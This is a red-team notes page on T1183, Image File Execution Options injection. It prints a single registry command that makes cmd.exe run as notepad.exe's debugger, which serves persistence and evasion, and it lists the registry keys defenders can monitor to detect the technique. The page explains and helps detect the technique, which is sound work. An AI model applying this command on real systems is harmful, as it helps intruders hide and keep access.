Red Teaming Experiments
Red Teaming Experiments
linkedin
github
@spotheplanet
patreon
What is this?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
T1134: Primary Access Token Manipulation
Windows NamedPipes 101 + Privilege Escalation
T1038: DLL Hijacking
T1108: WebShells
T1183: Image File Execution Options Injection
Unquoted Service Paths
Pass The Hash: Privilege Escalation with Invoke-WMIExec
Environment Variable $Path Interception
Weak Service Permissions
Credential Access & Dumping
Lateral Movement
Persistence
Exfiltration
reversing, forensics & misc
Windows Kernel / Internals
Exploring Process Environment Block
ETW: Event Tracing for Windows 101
Parsing PE File Headers with C++
Exploring Injected Threads
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered by GitBook

T1183: Image File Execution Options Injection

Defense Evasion, Persistence, Privilege Escalation

Execution

Modifying registry to set cmd.exe as notepad.exe debugger, so that when notepad.exe is executed, it will actually start cmd.exe:

attacker@victim
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /d "cmd.exe"

Launching a notepad on the victim system:

Same from the cmd shell:

Observations

Monitoring command line arguments and events modifying registry keys: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options/<executable> and HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable> should be helpful in detecting this attack:

References

Previous
T1108: WebShells
Next
Unquoted Service Paths
Last updated 2 years ago
Contents
Execution
Observations
References